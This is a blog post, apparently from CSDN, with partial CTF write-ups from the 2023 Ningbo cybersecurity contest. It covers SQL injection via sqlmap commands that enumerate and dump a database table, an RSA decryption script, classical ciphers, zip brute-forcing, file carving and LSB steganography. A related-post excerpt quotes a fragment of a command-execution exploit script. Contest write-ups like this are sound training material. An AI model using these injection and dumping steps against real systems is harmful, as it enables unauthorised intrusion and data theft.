2023宁波市第六届网络安全大赛部分wp

已于 2023-05-20 15:10:22 修改
阅读量513 收藏 2
点赞数 1
分类专栏: wp 文章标签: web安全 安全
于 2023-05-20 14:01:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58030673/article/details/130780834
版权

目录

Web

Query

Crypto

secret

Morse的笔记本

Misc

zip

SimpleDocument

BeautifulImage

Web

Query

sql注入,bp抓包保存为1.txt,用sqlmap跑一下得到结果

sqlmap -r /home/csxf418/桌面/1.txt  -p username -D mysql --tables

79e31116853b4709a603e9e2c7e0c0de.png

sqlmap -r /home/csxf418/桌面/1.txt  -p username -D ctf --tables

34f7033da36b4c03bd63b3163c7859c4.png

sqlmap -r /home/csxf418/桌面/1.txt  -p username -D ctf -T f111 --columns

6b861f9cb1e14a32abce7ded60e0ef72.png

sqlmap -r /home/csxf418/桌面/1.txt  -p username -D ctf -T f111 -C flagdata --dump

a3a0d0e221164e26b348e2d35f4e4229.png

Crypto

secret

给了p,q,n,c,e,看样子是rsa,这里发现e,phi不互素,脚本跑一下

import libnum,gmpy2

from Crypto.Util.number import long_to_bytes


p=134261118796789547851478407090640074022214132682000430136383795981942884853000826171189906102866323044078348933419038543719361923320694974970600426450755845839235949167391987970330836004768360774676424958554946699767582105556239177450470656065560178592346659948800891455240736405480828554486592172443394370831

q=147847444534152128997546931602292266094740889347154192420554904651813340915744328104100065373294346723964356736436709934871741161328286944150242733445542228293036404657556168844723521815836689387184856871091025434896710605688594847400051686361372872763001355411405782508020591933546964183881743133374126947753

n=19850163314401552502654477751795889962324360064924594948231168092741951675262933573691070993863763290962945190372400262526595224437463969238332927564085237271719298626877917792595603744433881409963046292095205686879015029586659384866719514948181682427744555313382838805740723664050846950001916332631397606277703888492927635867870538709596993987439225247816137975156657119509372023083507772730332482775258444611462771095896380644997011341265021719189098262072756342069189262188127428079017418048118345180074280858160934483114966968365184788420091050939327341754449300121493187658865378182447547202838325648863844192743

c=13913396366755010607043477552577268277928241319101215381662331498046080625902831202486646020767568921881185124894960242867254162927605416228460108399087406989258037017639619195506711090012877454131383568832750606102901110782045529267940504471322847364808094790662696785470594892244716137203781890284216874035486302506042263453255580475380742959201314003788553692977914357996982118328587119124144181290753389394149235381045389696841471483947310663329993873046123134587149661347999774958105091103806375702387084149309542351541021140111048408248121408401601979108510758891595550054699719801708646232427198902271953673874

e=28    #4*7

fn=(p-1)*(q-1)

d4 = libnum.invmod(7,fn)

# print("d4=%d" % d)

m4 = pow(c, d4, n)

m = gmpy2.iroot(m4,4)[0]

flag = long_to_bytes(m)

print(flag)

 

ed5c7eef9a2940eeb03be1afc4b17aa2.png

Morse的笔记本

将文字中的句号看成点,逗号看成短杠,感叹号看出斜杠

解出摩斯密码为:PASSWORDISCONGRATS

69ca4ca5c8724d7897e01a16b053eab5.png

维吉尼亚解密得到

4d1268853ad14e80bde32dc05d345287.png

凯撒枚举得到flag

e34dcaf30c3d4271bfe6917f4efae8b2.png

Misc

zip

1f761958bee94651a1d3d9ab5eb97adb.png

打开发现有提示,密码由0和1组成,最多不超过9位数,爆破一下

5f241adb1df14e92bdcd301138eb6ee0.png

打开得到flag

SimpleDocument

根据提示不只有图片,猜测还隐藏了文件,kali下foremost命令分离文件,得到一个pdf

c71239f7b5134585bf4ffdc6e4fb83ae.png

pdftotext 00000130.pdf 1.txt

将pdf文件转成txt,得到flag

edde4c39dd0f40c296e92da8fc8359b2.png

BeautifulImage

LSB隐写,StegSolve打开,看到一串像是base64

03d4ec9172d84d378cea51f7d14b7e11.png

解码一下得到flag

b76b3235645a4657a93fae479305daa9.png

 

红烧大鸡块
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【电子取证】程序分析(第六届”蓝帽杯“全国大学生网络安全技能大赛
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
【电子取证】网站取证(第六届”蓝帽杯“全国大学生网络安全技能大赛
07-12
第六届”蓝帽杯“全国大学生网络安全技能大赛
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
赛博地球杯工业互联网安全大赛wp1
08-03
赛博地球杯工业互联网安全大赛wp1
2021宁波市第四届网络安全大赛练习赛
Huamang的博客
05-23 724
签到咯~ 看响应头 Myself~ 请求头修改 php是……~ <?php include 'flag.php'; extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "&
“天一永安杯”2023宁波市第六届网络安全大赛 re wp
Todog的博客
05-28 628
这里会看高位是0还是1,0就会触发异常,我们的sum会进行异或。一直f7,循环就跳过。upx壳,被魔改了。so文件比对,base64直接解。发现有花指令,全patch掉。发现是RC4,但是有改动。然后就可以正常f5看了。
2021宁波市第四届网络安全大赛——预赛
weixin_52805837的博客
05-24 867
Web1: 先7位可控字符下的任意命令执行 exp:#!/usr/bin/python -- coding: UTF-8 -- import requests url = “http://119.61.19.212:50070/exec.php?1={0}” print("[+]start attack!!!") with open(“payload.txt”, “r”) as f: for i in f: print("[*]" + url.format(i.strip())) requests.get(
2022宁波市第五届网络安全大赛密码方向wp
mxx307的博客
05-16 1843
2022宁波市第五届网络安全大赛cryptowp CrackCi4er 题目 n1 = 111762988704157832828352756000615886572414632218718154915195524634082225658480791820347261855532173006898340066914729911294413973225978268352504479418416912217224467214165430937398040953402899080808675144730170
宁波市第三届网络安全大赛(NSCTFWP
zhwho的博客
07-12 2359
** 写在开头 从简书回来了,入坑简书半年,由于个人原因,简书账号注销了,以后就在CSDN上写啦 hhhh ** 前段时间和室友一起参加了这次NSCTF,做的题比较杂,WEB、MISC、密码,想着这几天会开环境给复现,现在看好像不给开环境,有的题保存下来了,这里先写写思路,有些截图没保存,以后有机会一定补上。 WEB 签到——本地访问 打开环境,印象里是有一句话: 只有本地管理员才能访问,你想越权访问吗? 这就很明显了,当然想越权访问,不然怎么拿flag?而拿flag的条件很明显有两个——1.本地 2.管理
2021宁波市第四届网络安全大赛(练习平台)RSA部分
qq_46075726的博客
05-22 616
挺久没有做过CTF了,明天就要打比赛了,临时抱佛脚,撸两道rsa,找找手感。 公钥文件泄露 题目给了两个文件:pub.key和flag.enc: ​ pub.key -----BEGIN PUBLIC KEY----- MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAMAzLFxkrkcYL2wch21CM2kQVFpY9+7+ /AvKr1rzQczdAgMBAAE= -----END PUBLIC KEY----- ​ flag.enc(乱码) ZF:9Mw 骓骼)P恂黮?沕悴[嘟
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
广东省2023技能大赛网络安全赛项 C模块wp
04-20
通过广东省2023技能大赛网络安全赛项B模块的解题思路的锻炼,选手们不仅能够提升自己的网络安全技能水平,还能够培养自己的逻辑思维能力和团队协作精神。这些能力在未来的学习和工作中都将发挥重要作用,为他们在...
广东省2023技能大赛网络安全赛项 中职 B模块wp
04-20
广东省2023技能大赛网络安全赛项B模块的解题思路,不仅是选手们展示自身网络安全技能的平台,更是对选手们逻辑思维、实践能力和团队协作精神的全面考验。在这个模块中,选手们需要针对特定的网络安全问题,进行深入...
广东省2023技能大赛网络安全赛项 中职 D模块wp
最新发布
04-20
通过广东省2023技能大赛网络安全赛项B模块的解题思路的锻炼,选手们不仅能够提升自己的网络安全技能水平,还能够培养自己的逻辑思维能力和团队协作精神。这些能力在未来的学习和工作中都将发挥重要作用,为他们在...
2023年全国职业院校技能大赛信息安全管理与评估—夺旗挑战CTF网络安全渗透)评分标准
旺仔Sec&blog
02-06 1113
夺旗挑战CTF网络安全渗透)一、人力资源管理系统(45分)FTP服务器(165分)应用系统服务器(30分)所需的设施设备和材料。运维服务器(30分)
NewStarCTF 2023 公开赛道 Week1
Fab1an的博客
10-02 2384
首先要通过Level 1 ,发现它是PHP的弱类型比较,只要两个数的md5加密后的值以0e开头就可以绕过,因为php在进行弱类型比较(即==)时,会先转换字符串的类型,再进行比较,而在比较时因为两个数都是以0e开头会被认为是科学计数法,0e后面加任何数在科学计数法中都是0,所以两数相等。数组为空,那么MD5加密之后都为0,那么就是相等的,满足条件,可以成功绕过。那么接下来需要绕过if(!打开之后,是一个登录界面,试一下管理员账号admin,密码123456,登录失败,那么我们抓包,然后爆破一下密码。
2023最新CTF入门的正确姿势
qq_53058639的博客
07-06 624
CTF全称为Capture The Flag,是一种网络安全技术竞赛,旨在提供一个具有挑战性的平台,让参赛者在不同领域(例如密码学、逆向工程、Web和二进制漏洞等)的技术挑战中展示自己的能力。CTF比赛最初起源于全球各大高校的安全技术课程中,由教授和学生组成的团队一起参加,在许多大型的安全技术会议中也均设有CTF比赛环节。CTF比赛一般由各种安全领域的问题和难题组成,参赛者需要利用自己的知识和技能从中寻找答案,并在时间限制内成功攻克它们。比赛通常由不同的阶段组成,每个阶段有不同的挑战和难度级别。
第六届宁波市赛 [NSCTF2023] 部分web+部分misc+部分密码+mobile
Leaf_initial的博客
05-20 290
只有web,misc是我写的,剩下的都是队的师傅写的,我是飞舞,就这样。
2022宁波市第五届网络安全大赛(初赛Misc部分
weixin_52961098的博客
05-17 1976
听说线下决赛有菠萝包吃? 解题情况:5题解4,一个三血,哆哆嗦嗦进决赛 BlackAndWhite 打开附件,发现是黑色和白色照片,猜测代表2进制,一共336张 脚本如下 white = open('D:/Users/huawei/Desktop/target/0.png', 'rb').read() black = open('D:/Users/huawei/Desktop/target/1.png', 'rb').read() ​ flag = '' ​ for i in range.
2023羊城杯密码wp
09-18
根据提供的引用内容,我们可以得出以下结论: 1. 引用给出了一个数学公式 C = A * M,其中 C包含flag的字符。 2. 引用提到了coppersmith算法,只要知道p的高位,就可以解密密码。 3. 引用介绍了一个函数corrupt(),它可以随机改变矩阵A中的元素,但有很大的可能性存在两行或更多的行没有发生变化。 根据提供的信息,我无法直接回答关于2023羊城杯密码的问题。因为这需要更多的上下文信息和算法知识。请您提供更多关于密码的相关信息,以便我可以帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值